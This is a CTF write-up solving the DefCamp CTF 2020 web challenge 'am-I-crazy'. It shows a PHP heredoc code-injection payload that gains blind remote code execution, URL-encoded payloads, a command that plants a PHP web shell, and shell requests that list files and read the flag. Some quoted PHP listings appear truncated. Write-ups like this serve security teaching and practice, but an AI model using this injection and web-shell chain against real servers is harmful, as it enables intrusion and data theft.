# DefCamp CTF 2020 – am-I-crazy

* **Category:** web  
* **Points:** ?

## Challenge

> You might see but you cannot feel.  
>  
> Flag format: CTF{sha256}  
>  
> The challenge was proposed by BIT SENTINEL.  
>  
> 35.198.103.37:31239

## Solution

The page will show the following HTML code.

```html

<head>  
<meta charset="utf-8">  
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-
fit=no">  
<meta name="description" content="">  
<meta name="author" content="">

<title>AM-I-CRAZY</title>

  
<link rel="stylesheet"
href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
crossorigin="anonymous">

</head>

<body>

<div class="container">  

<div class="jumbotron">  
<h1 class="display-3">AM I CRAZY</h1>  

Use a random password and the bellow button to generate or restore to the
initial state the challenge.  
<form method="POST" action="/">  
<div class="form-group" style=""><label>Password:</label><input
pattern=".{8,}" name="password" type="password" class="form-control"
style="display: block; position: static; float: none;" required></div>

  

<button type="submit" class="btn btn-lg btn-success" href="#"
role="button">Generate</button>

  
</form>  
</div>

</div>  

</body>  
</html>  
```

You have to insert a password with at least 8 chars.

Inserting 8 `a`s will open the following URL
`http://35.198.103.37:31239/secrets/64f79ab242648e5c493c6af52ee4469a/index.php`
with the following content.

```php  
10 15){  
$_GET['tryharder'] = 0;  
}  
$contents = file_get_contents(__FILE__);  
$search_pattern = '/\$var = <<<xd\s*(.*)\s*xd/im';  
preg_match($search_pattern, $contents, $matches);  
  
$new_contents = preg_replace_callback($search_pattern, function($matches) {  
return str_replace($matches[1], $_GET['tryharder'], $matches[0]);  
}, $contents);  
file_put_contents(__FILE__, $new_contents, LOCK_EX);  
});  
```

After the button press, you are redirected to a page like the following URL:
`/secrets/3db406bb8ed1399d75a88f31b9aac730/index.php`

Here you can specify a value for the `tryharder` parameter.

```  
GET
/secrets/3db406bb8ed1399d75a88f31b9aac730/index.php?tryharder=<your_value_here>
HTTP/1.1  
Host: 35.242.253.155:30574  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101
Firefox/82.0  
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Referer: http://35.242.253.155:30574/  
Upgrade-Insecure-Requests: 1  
```

A payload can be the following, in order to use *code injection* to break the
*heredoc* and obtain a blind RCE.

```php  
xd;  
`$_GET[0]`;  
```

Payload must be URL-encoded.

```  
%78%64%3B%0A%60%24%5F%47%45%54%5B%30%5D%60%3B  
```

Sending it, the page will become the following.

```php  
1 15){  
$_GET['tryharder'] = 0;  
}  
$contents = file_get_contents(__FILE__);  
$search_pattern = '/\$var = <<<xdxd;  
`$_GET[0]`;xd/im';  
preg_match($search_pattern, $contents, $matches);  
  
$new_contents = preg_replace_callback($search_pattern, function($matches) {  
return str_replace($matches[1], $_GET['tryharder'], $matches[0]);  
}, $contents);  
file_put_contents(__FILE__, $new_contents, LOCK_EX);  
});  
```

Using the blind RCE, you can execute a command to create another PHP page with
a more useful web shell. For example, the following code can be used.

```php  
echo 'Output:<br />``' > shell.php  
```

Payload must be URL-encoded.

```  
%65%63%68%6F%20%27%4F%75%74%70%75%74%3A%3C%62%72%20%2F%3E%3C%63%6F%64%65%3E%3C%3F%70%68%70%20%65%63%68%6F%20%73%79%73%74%65%6D%28%24%5F%47%45%54%5B%30%5D%29%3B%3F%3E%3C%2F%63%6F%64%65%3E%27%20%3E%20%73%68%65%6C%6C%2E%70%68%70  
```

Now you have a simpler web shell to use that returns the output of executed
commands. Commands are passed via GET `0` URL parameter.

With this you can discover where the flag is.

```  
http://35.242.253.155:30574/secrets/0641302347967910d65b269202ed912d/shell.php?0=ls%20-al%20../../

Output:  
total 56  
drwxrwxrwx 1 www-data www-data 4096 Dec 6 12:25 .  
drwxr-xr-x 1 root root 4096 Sep 12 2019 ..  
-rw-r--r-- 2 www www 2 Dec 6 10:57 apache2.pid  
-rw-rw-r-- 1 root root 153 Dec 1 08:31 flag.php  
lrwxrwxrwx 1 www www 6 Dec 6 12:25 html -> l/html  
-rw-rw-r-- 1 root root 2692 Dec 1 08:31 index.php  
drwxrwxr-x 1 www www 24576 Dec 6 19:18 secrets  
drwxrwxr-x 1 www www 24576 Dec 6 19:18 secrets  
```

You can copy the flag file in the current directory.

```  
http://35.242.253.155:30574/secrets/0641302347967910d65b269202ed912d/shell.php?0=cp%20../../flag.php%20.

http://35.242.253.155:30574/secrets/0641302347967910d65b269202ed912d/shell.php?0=ls%20-al

Output:  
total 44  
drwxr-xr-x 2 www www 4096 Dec 6 19:35 .  
drwxrwxr-x 1 www www 24576 Dec 6 19:18 ..  
-rw-r--r-- 1 www www 153 Dec 6 19:35 flag.php  
-rw-r--r-- 1 www www 770 Dec 6 19:31 index.php  
-rw-r--r-- 1 www www 57 Dec 6 19:31 shell.php  
-rw-r--r-- 1 www www 57 Dec 6 19:31 shell.php  
```

And print the flag file content.

```  
http://35.242.253.155:30574/secrets/0641302347967910d65b269202ed912d/shell.php?0=cat%20flag.php

Output:

```

The flag is the following.

```  
CTF{d067ddd00ba4129e83898758ac321533f392364cfaca7967d66791d9d08823bb}  
```

Original writeup (https://github.com/m3ssap0/CTF-
Writeups/blob/master/DefCamp%20CTF%202020/am-I-crazy/README.md).